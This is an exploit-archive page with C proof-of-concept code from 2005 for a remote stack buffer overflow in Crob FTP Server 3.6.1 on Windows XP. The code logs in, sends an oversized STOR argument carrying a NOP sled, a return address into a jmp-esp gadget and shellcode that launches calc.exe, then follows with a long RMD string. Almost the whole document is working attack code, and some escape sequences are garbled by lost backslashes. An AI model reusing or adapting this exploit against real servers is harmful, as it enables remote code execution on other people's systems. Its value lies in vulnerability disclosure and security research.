[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Crob FTP Server <= 3.6.1 Remote Stack Overflow Exploit
# Published : 2005-06-03
# Author : Leon Juranic
# Previous Title : IPSwitch IMAP Server LOGON Remote Stack Overflow
# Next Title : e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit
/*
* CrobFTP remote stack overflow PoC
* ---------------------------------
* Tested on Crob FTP Server 3.6.1, Windows XP
*
* Coded by Leon Juranic <ljuranic@lss.hr>
* LSS Security / http://security.lss.hr
*
*/
#include <stdio.h>
#include <windows.h>
#include <time.h>
#pragma comment (lib,"ws2_32")
char *fzz_recv (int sock)
{
fd_set fds;
struct timeval tv;
static char buf[10000];
char *ptr=buf;
int n;
tv.tv_sec = 5;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock,&fds);
if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
buf[n-1] = '�';
printf ("RECV: %sn",buf);
return buf;
}
else {
return NULL;
}
}
int login (int sock, char *user, char *pass)
{
char buf[1024], *bla;
bla=fzz_recv(sock);
printf ("recv: %sn",bla);
sprintf (buf,"USER %srn",user);
send (sock,buf,strlen(buf),0);
bla=fzz_recv(sock);
printf ("recv: %sn",bla);
sprintf (buf,"PASS %srn",pass);
send (sock,buf,strlen(buf),0);
bla=fzz_recv(sock);
printf ("recv: %sn",bla);
if (strcmp("230",bla) != NULL)
return 0;
else return -1;
return 0;
}
void lame_sploit (char *pack, char *user, char *pass)
{
WORD wVersionRequested;
WSADATA wsaData;
int sock, err,x;
struct sockaddr_in sin;
char buf[2000],tmp[1000];
char *shell= // 5 min. XP SP1 shellcode
"x33xc0" // xor eax,eax
"x50" // push eax (�)
"x68x2ex65x78x65" // push '.exe'
"x68x63x61x6cx63" // push 'calc'
"x54" // push esp
"xbax44x80xc2x77" // mov edx, 77c28044
"xffxd2"; // call edx (system)
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf ("ERROR: Sorry, cannot create socket!!!n");
ExitProcess(-1);
}
sock=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(pack);
sin.sin_port = htons(21);
if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
printf ("CONNECT :(((n");
ExitProcess(-1);
}
if (login(sock,user,pass) == -1)
{
printf ("ERROR: Cannot login to FTP server, sorry!!!n");
exit(-1);
}
memset(tmp,0,sizeof(tmp));
memset (tmp,0x90,180);
memcpy (&tmp[80],shell,strlen(shell));
*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
*(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74
*(long*)&tmp[170] = 0x9090e4ff; // jmp esp
_snprintf (buf,sizeof(buf),"STOR %srn", tmp);
printf ("DEBUG: %.30s %dn",buf,strlen(buf));
send (sock,buf,strlen(buf),0);
printf ("%sn",fzz_recv(sock));
strcpy(buf,"RMD ");
for (x=0;x<276;x++)
strcat (buf,".../");
strcat(buf,"rn");
printf ("Sending exploit stringsn");
send (sock,buf,strlen(buf),0);
printf ("recv: %sn",fzz_recv(sock));
}
main (int argc, char **argv)
{
printf ("CrobFTP Stack overflow PoC n"
"Coded by Leon Juranic <ljuranic@lss.hr>n"
"LSS Security / http://security.lss.hr/n");
if (argc < 4 ) {
printf ("nusage: %s <target_IP> <user> <pass>n",argv[0]);
exit(-1);
}
lame_sploit(argv[1],argv[2],argv[3]);
}
// www.Syue.com [2005-06-03]